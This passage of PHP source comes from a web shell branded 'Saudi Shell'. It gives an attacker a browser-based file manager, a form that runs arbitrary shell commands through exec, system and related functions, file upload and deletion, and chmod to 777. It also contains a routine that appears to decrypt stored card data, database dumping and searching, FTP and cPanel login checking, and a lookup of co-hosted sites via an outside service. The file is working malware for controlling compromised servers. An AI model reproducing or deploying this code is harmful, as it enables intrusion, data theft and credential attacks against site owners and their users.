2839 ftp_check($target,$_user,$_pass,$connect_timeout);
2840 }
2841 if ($option == "cpanel")
2842 {
2843 cpanel_check($target,$_user,$_pass,$connect_timeout);
2844 }
2845 }
2846 }
2847 
2848 
2849 
2850 
2851 }
2852 
2853 
2854 
2855 
2856 
2857 
2858 break;
2859 
2860 
2861 ///////////////////////////////////////////////////// about ///////////////////////////////////////////
2862 case 'ab':
2863 
2864 echo '<div class="hedr"> <img src="http://im15.gulfup.com/2012-02-03/1328281037731.png" alt="Saudi Shell" > </div><br /> ';
2865 echo "<div class='ab'><table cellpadding='5'  align='center'>";
2866 echo "<tr><td><b>Coded By :</b> al-swisre</td></tr>";
2867 echo "<tr><td><b>E-mail :</b> oy3@hotmail.com</td></tr>";
2868 echo "<tr><td><b>From :</b> Saudi Arabian</td></tr>";
2869 echo "<tr><td><b>Age :</b> 2/1995</td></tr>";
2870 echo "<tr><td><b>twitter :</b> <a  target='_blank'href='https://twitter.com/#!/al_swisre'>al_swisre</a></td></tr>";
2871 echo "<tr><td><b>S.Greetz 2 :</b> Mr.Alsa3ek - Ejram Hacker</td></tr>";
2872 echo "<tr><td><b>Greetz 2 :</b> e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 -  Mr.Pixy </td></tr><tr><td><b>And :</b> Mr.Black  - IraQiaN-r0x - Oxygen - locked - n4ss  .. and  All members of v4-team.com </td></tr></div>";
2873 
2874 exit;
2875 break;
2876 
2877 
2878 
2879 
2880 
2881 
2882 
2883 
2884 
2885 }
2886 
2887 
2888 
2889 
2890 
2891 
2892 
2893 
2894 }
2895 else
2896 {
2897 /////////// File Manager //////////////
2898 
2899 $sws = 'al-swisre' ;
2900 if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
2901 
2902 if(@$_GET['dir']){
2903     $dir = $_GET['dir'];
2904     if($dir != 'nullz') $dir = @cleandir($dir);
2905 }
2906 
2907 $curdir = @cleandir(@getcwd());
2908 $self = $_SERVER['PHP_SELF'];
2909 $me = $_SERVER['PHP_SELF'];
2910 
2911 if($dir=="") $dir = $curdir;
2912     $dirx = explode(DIRECTORY_SEPARATOR, $dir);
2913     $files = array();
2914     $folders = array();
2915     echo"<br /><div class='t33p'><table cellpadding='0' align='center' width='100%' >";
2916     echo"<tr><td style=\"text-align: left\" >";
2917     echo" Your path : &nbsp;";
2918     for($i=0;$i<count($dirx);$i++){
2919         @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR;
2920         echo("<a href='" . $me . "?dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTORY_SEPARATOR);
2921     }
2922     echo "<td></tr></table></div><br />";
2923     echo"<div class='t3p'><table cellpadding='0' align='center' width='100%' >";
2924     echo"<tr><td>Name</td><td>Size</td><td>Modify</td><td>Owner/Group</td><td>Permissions</td><td>Option<td></td></tr>";
2925     if ($handle = @opendir($dir)) {
2926         while (false != ($link = readdir($handle))) {
2927                $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ;
2928                $gr = @posix_getgrgid(@filegroup($dir."/".$link));
2929             if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){
2930                 $file = array();
2931                 @$file['link'] = "<a href='$me?dir=$dir" . DIRECTORY_SEPARATOR . "$link'>[ $link ]</font></a>";
2932                 $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
2933                 $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
2934 
2935                 $folder = "<tr><td> ".$file['link']."</td><td>dir</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
2936 
2937                 array_push($folders, $folder);
2938             }
2939             else{
2940                 $file = array();
2941                 $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : "";
2942                  $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
2943                  $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
2944                  $file['size'] = @number_format(@filesize($dir."/".$link)/1024,2);
2945                    @$file['link'] = "<a href='?sws=edit&file=$link&dir=$dir'\">".$link ."</a>";
2946                  $file = "<tr><td>".$file['link']."</td><td>".$file['size']."</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=edit&file=$link&dir=$dir'\">E</a> - <a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=dow&file=$link&dir=$dir'\">D</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
2947                 array_push($files, $file);
2948             }
2949 
2950         }
2951          asort($folders);
2952          asort($files);
2953 
2954         foreach($folders as $folder) echo $folder;
2955        foreach($files as $file) echo $file;
2956         echo "</table></div>" ;
2957         closedir($handle);
2958 
2959 
2960 }
2961 
2962 
2963 
2964 
2965 
2966 
2967 
2968 
2969 
2970 
2971 
2972 
2973 
2974 
2975 }
2976 
2977 
2978 if ($_GET['sws'] == 'rname')
2979 {
2980 
2981 $dir = $_GET['dir'];
2982 
2983 $file = $_GET['file'];
2984 
2985 if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
2986 
2987 if (!isset($_POST['edit']))
2988 {
2989 
2990 echo "<br />
2991 <div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
2992 <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
2993 dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
2994 <form method='post'>
2995 new name : <input type='text' value='$file' name='name'  /><br /><br />
2996 <input type='submit' value='edit' name='edit' />
2997 
2998 </form>
2999 
3000  ";
3001 }else
3002 {
3003 
3004 $new = $_POST['name'];
3005 
3006 $rn = @rename ($dir."/".$file,$dir."/".$new);
3007 
3008 if(!$rn)
3009 {
3010 
3011 
3012 @cmd("cd $dir;mv $file $new ");
3013 
3014 
3015 }else
3016 {
3017 
3018 echo "<br /><br />Name change successfully";
3019 
3020 echo "<br /><br /><a href='?sws=rname&file=$new&dir=$dir'\">[ Back ]</a>";
3021 
3022 }
3023 
3024 
3025 
3026 }
3027 }
3028 
3029 
3030 
3031 
3032 
3033 if ($_GET['sws'] == 'chmod')
3034 {
3035 
3036 $dir = $_GET['dir'];
3037 
3038 $file = $_GET['file'];
3039 
3040 if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
3041 
3042 if (!isset($_POST['edit']))
3043 {
3044 
3045 echo "<br />
3046 <div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
3047 <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
3048 dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
3049 <form method='post'>
3050 File to chmod: <input type='text' value=".$dir."/".$file." name='file' />&nbsp;&nbsp;&nbsp;<select name=\"ch\">
3051 <option value=\"755\">755</option>
3052 <option value=\"777\">777</option>
3053 <option value=\"644\">644</option>
3054 </select>
3055 <br /><br /><input type='submit' value='chmod' name='edit' />
3056 
3057 </form>
3058 
3059  ";
3060 }
3061 else
3062 {
3063 
3064 $pir = $_POST['ch'];
3065 
3066 if ($pir == '755'
3067 )
3068 
3069 {
3070    $cd = @chmod($_POST['file'],0775);
3071 }
3072 elseif ($pir == '777')
3073        {
3074    $cd = @chmod($_POST['file'],0777);
3075 
3076        }
3077 elseif ($pir == '644')
3078 {
3079 
3080 $cd = $cd = @chmod($_POST['file'],0644);
3081 
3082 }
3083 
3084 if(!$cd)
3085 {
3086 echo "ERROR";
3087 
3088 }else
3089 {
3090 
3091 echo "changed Successfully";
3092 echo "<br /><br /><a href='?sws=chmod&file=$file&dir=$dir'\">[ Back ]</a>";
3093 
3094 
3095 }
3096 
3097 }
3098 }
3099 
3100 if ($_GET['sws'] == 'edit')
3101 {
3102 
3103 $file = $_GET['file'];
3104 $dir = $_GET['dir'];
3105 
3106 if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
3107 
3108 if (!isset($_POST['ed']))
3109 {
3110 
3111 $fil33 = @fopen($dir."/".$file, 'r');
3112 $content = @fread($fil33, @filesize($dir."/".$file));
3113 
3114 echo "
3115 <div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
3116 <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
3117 <br />
3118 dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
3119 <form method=\"post\">
3120 <br /><textarea cols=\"85\" rows=\"25\" name=\"fil3\">";
3121 echo htmlentities($content) . "\n";
3122 echo '
3123 </textarea>
3124 <br /><br />
3125 <input type="submit" name="ed" value="Save !"/>
3126 </form>
3127 
3128 ';
3129 
3130 }
3131 else
3132 {
3133 
3134 
3135 $oo = @fopen($dir."/".$file, 'w');
3136       $ow =   @fwrite($oo, @stripslashes($_POST['fil3']));
3137         @fclose($oo);
3138         if (!$ow){echo "Error";}else {
3139           echo header("Location: ?sws=edit&file=$file&dir=$dir");
3140           }
3141 
3142 
3143 
3144 
3145 
3146 }
3147 
3148 
3149 
3150 
3151 }
3152 else if ($_GET['sws'] == 'dow')
3153 {
3154 $file = $_GET['file'];
3155 $dir = $_GET['dir'];
3156 
3157 @sa_download ($dir."/".$file);
3158 
3159 
3160 }
3161 /////////////////////////////////////////////////////
3162 if ($_GET['sws'] == 'rm')
3163 {
3164 
3165 $dir = $_GET['dir'];
3166 
3167 $file = $_GET['file'];
3168 
3169 if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
3170 
3171 if (!isset($_POST['edit']))
3172 {
3173 
3174 echo "<br />
3175 <div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
3176 <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
3177 <br />
3178 dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
3179 <form method='post'>
3180 <input type='submit' value='Delete' name='edit' />
3181 
3182 </form>
3183 
3184  ";
3185 }else
3186 {
3187 
3188 
3189 $rn = @unlink ($dir."/".$file);
3190 
3191 if(!$rn)
3192 {
3193 
3194 
3195 $rn = @rmdir ($dir."/".$file);
3196 
3197 
3198 
3199 }elseif (!$rn)
3200 {
3201  $rn =  @cmd("cd $dir;rm $file");
3202 
3203 }
3204 else if (!$rn){@cmd ("cd $dir;rm -r $file");}
3205 else{
3206 
3207 echo header("Location: $pg?dir=$dir");
3208 }
3209 
3210 echo header("Location: $pg?dir=$dir");
3211 
3212 }
3213 }
3214 ///////////////////////////////////////////////////////////////////////////////// mkdir //////////////////////////////
3215 
3216 else if ($_GET['sws'] == 'mkdir')
3217 {
3218 
3219 
3220 $dir = $_POST['dir'];
3221 $file = $_POST['n4me'];
3222 
3223 $mkdir = @mkdir ($dir."/".$file,0755);
3224 
3225 if (!$mkdir){@cmd ("mkdir $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
3226 header("Location: $pg?dir=$dir");
3227 
3228 }
3229 
3230 
3231 else if ($_GET['sws'] == 'mkfile')
3232 {
3233 
3234 $dir = $_POST['dir'];
3235 $file = $_POST['n4me'];
3236 
3237 
3238 $mkdir = @fopen($dir."/".$file,'w');
3239 
3240 if (!$mkdir){@cmd ("touch $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
3241 
3242 
3243 }
3244 
3245 else if ($_GET['sws'] == 'up')
3246 {
3247 
3248 
3249 $dir = $_POST['dir'];
3250 
3251 
3252 if(@move_uploaded_file($_FILES['upfile']['tmp_name'], $dir."/".$_FILES['upfile']['name'])) { header("Location: $pg?dir=$dir"); }
3253    else { echo '<br /><br />Not uploaded !!<br><br>';exit; }
3254 
3255 }
3256 
3257 
3258 //////////////////////////// read file /////////////////////
3259 
3260 else if ($_GET['sws'] == 'rfile')
3261 {
3262 
3263 
3264 
3265 $file = $_POST['n4me'];
3266 
3267 echo "dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />  ";
3268 
3269 if (!isset($file)){$file = $_GET['dir']."/".$_GET['file'];}
3270 
3271 echo "<div>";
3272 
3273 $r3ad = @fopen($file, 'r');
3274 if ($r3ad){
3275 $content = @fread($r3ad, @filesize($file));
3276 echo "<pre>".htmlentities($content)."</pre>";
3277 }
3278 else if (!$r3ad)
3279 {
3280 echo "<pre>";
3281 $r3ad = @show_source($file) ;
3282 echo "</pre>";
3283 }
3284 else if (!$r3ad)
3285 {
3286 echo "<pre>";
3287 $r3ad = @highlight_file($file);
3288 echo "</pre>";
3289 }
3290 else if (!$r3ad)
3291 {
3292 echo "<pre>";
3293 $sm = @symlink($file,'sym.txt');
3294 
3295 
3296 if ($sm){
3297 $r3ad = @fopen('sym.txt', 'r');
3298 $content = @fread($r3ad, @filesize($dir."/".$file));
3299 echo "<pre>".htmlentities($content)."</pre>";
3300 }
3301 }
3302 
3303 echo "</div>";
3304 
3305 //////////////////////// cmd /////////////////////////////////
3306 
3307 
3308 }else if ($_GET['sws'] == 'cmd')
3309 {
3310 $cmd = $_POST['n4me'];
3311 $dir = $_POST['dir'];
3312 
3313 if (isset($cmd))
3314 {
3315 
3316 
3317 echo "<br /><textarea cols='65' rows='25' name='fil3'> ";
3318 
3319 echo @cmd("cd $dir;$cmd") ;
3320 
3321 echo " </textarea>";
3322 
3323 
3324 
3325 }
3326 
3327 
3328 
3329 
3330 }
3331 else if ($_GET['sws'] == 'site')
3332 {
3333 
3334 
3335 
3336 
3337 $read = @file_get_contents("http://networktools.nl/reverseip/$ips") ;
3338 
3339 $sit3 = @findit($read,"<pre>","</pre>");
3340 
3341 echo "<br /><div class='site'><pre> ";
3342 
3343 
3344 echo $sit3;
3345 
3346 echo "</pre> </div>";
3347 
3348 exit;
3349 
3350 
3351 }
3352 
3353 
3354 
3355 
3356 
3357 
3358 
3359 
3360 
3361 
3362 if(@$_GET['dir']){
3363     $dir = $_GET['dir'];
3364     if($dir != 'nullz') $dir = cleandir($dir);
3365 }
3366 
3367 echo "
3368 
3369 <br /><br />
3370 </div><div class='d0n'>
3371 <br /><br />
3372 <table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"   >
3373 
3374 <tr><td><form method='GET''>
3375 Change dir : <br />
3376 <input type='text' name='name' value='$dir' size='25' />
3377 <input type='hidden'  name='dir' value='$dir' />
3378 
3379 <input type='submit' value='Go' />
3380 </form> </td>
3381 
3382 <td style=\"float: left\">  <form method='POST' action='$pg?sws=mkdir' >
3383 
3384 Make dir :<br />
3385 <input type='text' name='n4me' size='25' />
3386 <input type='hidden'  name='dir' value='$dir' />
3387 <input type='submit' value='Go' /></div>
3388 </form></td></tr>
3389 
3390 
3391 <tr><td><form method='post' action='$pg?sws=rfile'>
3392 read file : <br />
3393 <input type='text' name='n4me' size='25' />
3394 <input type='hidden'  name='dir' value='$dir' />
3395 <input type='submit' value='Go' />
3396 </form> </td>
3397 
3398 
3399 <td style=\"float: left\">  <form method='post'  action='$pg?sws=mkfile' >
3400 
3401 Make file :<br />
3402 <div style=\"text-align: right\">
3403 <input type='text' name='n4me' size='25' />
3404 <input type='hidden'  name='dir' value='$dir' />
3405 <input type='submit' value='Go' /></div>
3406 </form></td></tr>
3407 
3408 
3409 <tr><td><form method='POST' action='$pg?sws=cmd'>
3410 Execute : <br />
3411 <input type='text' name='n4me' size='25' />
3412 <input type='hidden'  name='dir' value='$dir' />
3413 <input type='submit' value='Go' />
3414 </form> </td>
3415 <b></b>
3416 
3417 
3418 <td style=\"float: left\">
3419 <form method='POST' enctype=\"multipart/form-data\" action='$pg?sws=up' >
3420 Upload file :<br />
3421 <div style=\"text-align: right\">
3422 <input type='file' name='upfile' value='Choose file' size='21' />
3423 <input type='hidden'  name='dir' value='$dir' />
3424 <input type='submit' value='Up' />
3425 </form></td></tr>
3426 
3427 
3428 
3429 </table>
3430  </div>
3431 ";
3432 //////////////////////////////////////// exit :d //////////////////////////
3433 
3434 
3435 
3436 
3437 
3438 
3439 
3440 
3441 
3442 
3443 
3444 
3445 
3446 
3447 
3448 
3449 
3450 
3451 
3452 
3453 
3454 
3455 
3456 function cmd($cfe)
3457 {
3458  $res = '';
3459  if (!empty($cfe))
3460  {
3461   if(function_exists('exec'))
3462    {
3463     @exec($cfe,$res);
3464     $res = join("\n",$res);
3465    }
3466   elseif(function_exists('shell_exec'))
3467    {
3468     $res = @shell_exec($cfe);
3469    }
3470   elseif(function_exists('system'))
3471    {
3472     @ob_start();
3473     @system($cfe);
3474     $res = @ob_get_contents();
3475     @ob_end_clean();
3476    }
3477   elseif(function_exists('passthru'))
3478    {
3479     @ob_start();
3480     @passthru($cfe);
3481     $res = @ob_get_contents();
3482     @ob_end_clean();
3483    }
3484   elseif(@is_resource($f = @popen($cfe,"r")))
3485   {
3486    $res = "";
3487    while(!@feof($f)) { $res .= @fread($f,1024); }
3488    @pclose($f);
3489   }
3490  }
3491  return $res;
3492 }
3493 
3494 function sa($i)
3495 {
3496 return @str_repeat("&nbsp;",$i);
3497 }
3498 
3499 
3500 
3501 function decrypt ($string,$cc_encryption_hash)
3502 {
3503     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
3504     $hash_key = _hash ($key);
3505     $hash_length = strlen ($hash_key);
3506     $string = base64_decode ($string);
3507     $tmp_iv = substr ($string, 0, $hash_length);
3508     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
3509     $iv = $out = '';
3510     $c = 0;
3511     while ($c < $hash_length)
3512     {
3513         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
3514         ++$c;
3515     }
3516 
3517     $key = $iv;
3518     $c = 0;
3519     while ($c < strlen ($string))
3520     {
3521         if (($c != 0 AND $c % $hash_length == 0))
3522         {
3523             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
3524         }
3525 
3526         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
3527         ++$c;
3528     }
3529 
3530     return $out;
3531 }
3532 
3533 
3534 function _hash ($string)
3535 {
3536     $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
3537     $out = '';
3538     $c = 0;
3539     while ($c < strlen ($hash))
3540     {
3541         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
3542         $c += 2;
3543     }
3544     return $out;
3545 }
3546 
3547 function backup_tables($path,$host,$user,$pass,$name,$tables = '*')
3548 {
3549 
3550   $link = @mysql_connect($host,$user,$pass);
3551   @mysql_select_db($name,$link);
3552 
3553   //get all of the tables
3554   if($tables == '*')
3555   {
3556     $tables = array();
3557     $result = @mysql_query('SHOW TABLES');
3558     while($row = @mysql_fetch_row($result))
3559     {
3560       $tables[] = $row[0];
3561     }
3562   }
3563   else
3564   {
3565     $tables = is_array($tables) ? $tables : explode(',',$tables);
3566   }
3567 
3568   //cycle through
3569   foreach($tables as $table)
3570   {
3571     $result = mysql_query('SELECT * FROM '.$table);
3572     $num_fields = mysql_num_fields($result);
3573 
3574        $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
3575        $return.= "\n\n".$row2[1].";\n\n";
3576 
3577     for ($i = 0; $i < $num_fields; $i++)
3578     {
3579       while($row = mysql_fetch_row($result))
3580       {
3581         $return.= 'INSERT INTO '.$table.' VALUES(';
3582         for($j=0; $j<$num_fields; $j++)
3583         {
3584           $row[$j] = addslashes($row[$j]);
3585           $row[$j] = ereg_replace("\n","\\n",$row[$j]);
3586           if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
3587           if ($j<($num_fields-1)) { $return.= ','; }
3588         }
3589         $return.= ");\n";
3590       }
3591     }
3592     $return.="\n\n\n";
3593   }
3594 
3595   //save file
3596   $handle = @fopen($path,'w+');
3597   @fwrite($handle,$return);
3598   @fclose($handle);
3599 }
3600 
3601 function search($string){
3602     $q = mysql_query("SHOW TABLE STATUS");
3603     $data = array();
3604     while($table = mysql_fetch_array($q)){
3605         $query = "SELECT * FROM $table[Name]";
3606         $result = mysql_query($query);
3607         $row = @mysql_fetch_assoc($result);
3608         if(!$row){
3609             continue;
3610         }
3611         $columns = array_keys($row);
3612         $data[$table['Name']] = $columns;
3613     }
3614     $tables = array();
3615     foreach($data as $table=>$columns){
3616         $query = "SELECT * FROM `$table` WHERE ";
3617         foreach($columns as $key=>$column){
3618             if($key == 0){
3619                 $query .= "`$column` LIKE '%$string%'";
3620             }else{
3621                 $query .= " OR `$column` LIKE '%$string%'";
3622             }
3623         }
3624         $query = mysql_query($query);
3625         $result = mysql_num_rows($query);
3626         if($result > 0){
3627             $tables[] = $table;
3628         }
3629     }
3630     $founded = array();
3631     foreach($tables as $table){
3632         $columns = $data[$table];
3633         foreach($columns as $column){
3634             $query = "SELECT * FROM `$table` WHERE `$column` LIKE '%$string%'";
3635             $query = mysql_query($query);
3636             $result = mysql_num_rows($query);
3637             if($result > 0){
3638                 $founded[] = array('table'=>$table,'column'=>$column);
3639             }
3640         }
3641     }
3642     return $founded;
3643 }
3644 
3645     function cleandir($d){ // Function to clean up the $dir and $curdir variables
3646     $d = @realpath($d);
3647     $d = str_replace("\\\\", "\\", $d);
3648     $d = str_replace("////", "//", $d);
3649     return($d);
3650 }
3651 
3652 function wsoPermsColor($f) {
3653    if (!@is_readable($f))
3654        return '<font color=#FF0000>' . @wsoPerms(@fileperms($f)) . '</font>';
3655    elseif (!@is_writable($f))
3656        return '<font color=white>' . @wsoPerms(@fileperms($f)) . '</font>';
3657    else
3658        return '<font color=#25ff00>' . @wsoPerms(@fileperms($f)) . '</font>';
3659 }
3660 
3661 function wsoPerms($p) {
3662    if (($p & 0xC000) == 0xC000)$i = 's';
3663    elseif (($p & 0xA000) == 0xA000)$i = 'l';
3664    elseif (($p & 0x8000) == 0x8000)$i = '-';
3665    elseif (($p & 0x6000) == 0x6000)$i = 'b';
3666    elseif (($p & 0x4000) == 0x4000)$i = 'd';
3667    elseif (($p & 0x2000) == 0x2000)$i = 'c';
3668    elseif (($p & 0x1000) == 0x1000)$i = 'p';
3669    else $i = 'u';
3670    $i .= (($p & 0x0100) ? 'r' : '-');
3671    $i .= (($p & 0x0080) ? 'w' : '-');
3672    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
3673    $i .= (($p & 0x0020) ? 'r' : '-');
3674    $i .= (($p & 0x0010) ? 'w' : '-');
3675    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
3676    $i .= (($p & 0x0004) ? 'r' : '-');
3677    $i .= (($p & 0x0002) ? 'w' : '-');
3678    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
3679    return $i;
3680 }
3681 
3682 function perm($file)
3683 {
3684  if(file_exists($file))
3685  {
3686   return @substr(@sprintf('%o', @fileperms($file)), -4);
3687  }
3688  else
3689  {
3690   return "????";
3691  }
3692 }
3693 
3694 function sa_download($path)
3695    {
3696    header('Content-Description: File Transfer');
3697     header('Content-Type: application/octet-stream');
3698     header('Content-Disposition: attachment; filename='.basename($path));
3699     header('Content-Transfer-Encoding: binary');
3700     header('Expires: 0');
3701     header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
3702     header('Pragma: public');
3703     header('Content-Length: ' . filesize($path));
3704     ob_clean();
3705     flush();
3706     readfile($path);
3707     exit;
3708    }
3709 
3710     function findit($mytext,$starttag,$endtag) {
3711  $posLeft  = @stripos($mytext,$starttag)+strlen($starttag);
3712  $posRight = @stripos($mytext,$endtag,$posLeft+1);
3713  return  @substr($mytext,$posLeft,$posRight-$posLeft);
3714 }
3715 
3716 function MsSQL()
3717 {
3718    if(@function_exists('mssql_connect'))
3719    {
3720        $msSQL = '<font color="red">ON</font>';
3721    }
3722    else
3723    {
3724        $msSQL = '<font color="green">OFF</font>';
3725    }
3726    return $msSQL;
3727 }
3728 function MySQL2()
3729 {
3730    $mysql_try = @function_exists('mysql_connect');
3731    if($mysql_try)
3732    {
3733        $mysql = '<font color="red">ON</font>';
3734    }
3735    else
3736    {
3737        $mysql = '<font color="green">OFF</font>';
3738    }
3739    return $mysql;
3740 }
3741 function Gzip()
3742 {
3743    if (@function_exists('gzencode'))
3744    {
3745        $gzip = '<font color="red">ON</font>';
3746    }
3747    else
3748    {
3749        $gzip = '<font color="green">OFF</font>';
3750    }
3751    return $gzip;
3752 }
3753 function MysqlI()
3754 {
3755    if (@function_exists('mysqli_connect'))
3756    {
3757        $mysqli = '<font color="red">ON</font>';
3758    }
3759    else
3760    {
3761        $mysqli = '<font color="green">OFF</font>';
3762    }
3763    return $mysqli;
3764 }
3765 function MSQL()
3766 {
3767    if (@function_exists('msql_connect'))
3768    {
3769        $mSql = '<font color="red">ON</font>';
3770    }
3771    else
3772    {
3773        $mSql = '<font color="green">OFF</font>';
3774    }
3775    return $mSql;
3776 }
3777 function PostgreSQL()
3778 {
3779    if(@function_exists('pg_connect'))
3780    {
3781        $postgreSQL = '<font color="red">ON</font>';
3782    }
3783    else
3784    {
3785        $postgreSQL = '<font color="green">OFF</font>';
3786    }
3787    return $postgreSQL;
3788 }
3789 
3790 function Oracle()
3791 {
3792    if(@function_exists('ocilogon'))
3793    {
3794        $oracle = '<font color="red">ON</font>';
3795    }
3796    else
3797    {
3798        $oracle = '<font color="green">OFF</font>';
3799    }
3800    return $oracle;
3801 }
3802 
3803 
3804 function RegisterGlobals()
3805 {
3806    if(@ini_get('register_globals'))
3807    {
3808        $registerg= '<font color="red">ON</font>';
3809    }
3810    else
3811    {
3812        $registerg= '<font color="green">OFF</font>';
3813    }
3814    return $registerg;
3815 }
3816 function HardSize($size)
3817 {
3818    if($size >= 1073741824)
3819    {
3820        $size = @round($size / 1073741824 * 100) / 100 . " GB";
3821    }
3822    elseif($size >= 1048576)
3823    {
3824        $size = @round($size / 1048576 * 100) / 100 . " MB";
3825    }
3826    elseif($size >= 1024)
3827    {
3828        $size = @round($size / 1024 * 100) / 100 . " KB";
3829    }
3830    else
3831    {
3832        $size = $size . " B";
3833    }
3834    return $size;
3835 }
3836 function Curl()
3837 {
3838    if(extension_loaded('curl'))
3839    {
3840        $curl = '<font color="red">ON</font>';
3841    }
3842    else
3843    {
3844        $curl = '<font color="green">OFF</font>';
3845    }
3846    return $curl;
3847 }
3848 
3849 function magicQouts()
3850 {
3851    $mag=get_magic_quotes_gpc();
3852    if (empty($mag))
3853    {
3854        $mag = '<font color="green">OFF</font>';
3855    }
3856    else
3857    {
3858        $mag= '<font color="red">ON</font>';
3859    }
3860    return $mag;
3861 }
3862 
3863 function openBaseDir()
3864 {
3865 $openBaseDir = @ini_get("open_basedir");
3866 if (!$openBaseDir)
3867     {
3868        $openBaseDir = '<font color="green">OFF</font>';
3869    }
3870     else
3871    {
3872        $openBaseDir = '<font color="red">ON</font>';
3873    }
3874    return $openBaseDir;
3875 }
3876 
3877 function ftp_check($host,$user,$pass,$timeout){
3878 $ch = curl_init();
3879 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
3880 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3881 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
3882 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
3883 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
3884 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
3885 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
